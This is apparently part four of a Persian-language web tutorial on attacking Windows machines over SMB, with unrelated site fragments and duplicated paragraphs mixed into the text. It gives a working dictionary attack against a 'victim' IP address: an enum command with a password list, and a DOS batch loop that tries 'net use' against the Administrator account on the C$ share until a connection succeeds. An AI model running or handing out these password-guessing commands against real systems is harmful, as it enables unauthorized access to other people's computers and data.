حمله از طریق پروتکل SMB (بخش چهارم)
استفاده از برنامه enum به عنوان ابزار قدرتمند کشف کلمه عبور نیز مناسب به نظر می رسد ، اما
اگر دسترسی به این برنامه میسر نشد ، انواع دیکشنری حمله روی اینترنت وجود دارد.
دستور زیر در برنامه enum برای کشف کلمه عبور به کار می رود :
ENUM enum -D -u "Administrator" -f
pswdfile.txt nnn.nnn.nnn.nnn
(سوئیچ کردن روی کامند D- یعنی این که دیکشنری حمله شروع به پردازش می کند، سوئیچ روی
کامند u- یعنی درخواست اسم کاربری (username) ، سوئیچ روی کامند f- یعنی درخواست به
کارگیری لیست کلمه های عبور و nnn... نیز شماره آی پی ماشین قربانی است که مورد حمله قرار
می گیرد.)
برای کسانی که enum ندارند می توان تحت داس اسکریپت بچ بصورت زیر درست کرد: (این اسکریپت تنها روی ویندوز 2000 و ادونس سرور 2000 یا ایکس پی کار می کند) :
برای کسانی که enum ندارند می توان تحت داس اسکریپت بچ بصورت زیر درست کرد: (این اسکریپت تنها روی ویندوز 2000 و ادونس سرور 2000 یا ایکس پی کار می کند) :
for /f "tokens=1" %%a in (pswdfile.txt) do
net
use * \\nnn.nnn.nnn.nnn\c$
/user:"Administrator" %%a
ارسال نظرات در انتظار بررسی: ۰ انتشار یافته: ۰
(یک نکته آموزشی بسیار مهم : بهترین Cracker و شکننده پسورد تحت داس کار می کند و هرگونه
برنامه دیگر جواب درست و واقعی نمی دهد.
برای این منظور خواندن لاین به لاین به فایل pswdfile.txt ضروری است و اختصاص دادن متغیری مانند a%% از واجبات است تا اسکریپت بچ درست کار کند. پس اجرا کردن کامند net use برای اتصال به اسم کاربری و ذخیره کردن کلمه عبور در متغیر a%% نیز در کنار آن رعایت شود و پس از شروع بهکار آنقدر جستجو می کند تا کلمه عبور مهمان را بیابد و پیام زیر را به شما منتقل کند :
برای این منظور خواندن لاین به لاین به فایل pswdfile.txt ضروری است و اختصاص دادن متغیری مانند a%% از واجبات است تا اسکریپت بچ درست کار کند. پس اجرا کردن کامند net use برای اتصال به اسم کاربری و ذخیره کردن کلمه عبور در متغیر a%% نیز در کنار آن رعایت شود و پس از شروع بهکار آنقدر جستجو می کند تا کلمه عبور مهمان را بیابد و پیام زیر را به شما منتقل کند :
"The command completed successfully"
تازه ها
گوناگون
پیشنهاد سردبیر
در تپش این هفته، ماجرای فریب و تعرض در پوشش عرفانهای دروغین و رمالی را بررسی کردیم
پشت پرده اتاقهای دود و طلسـم
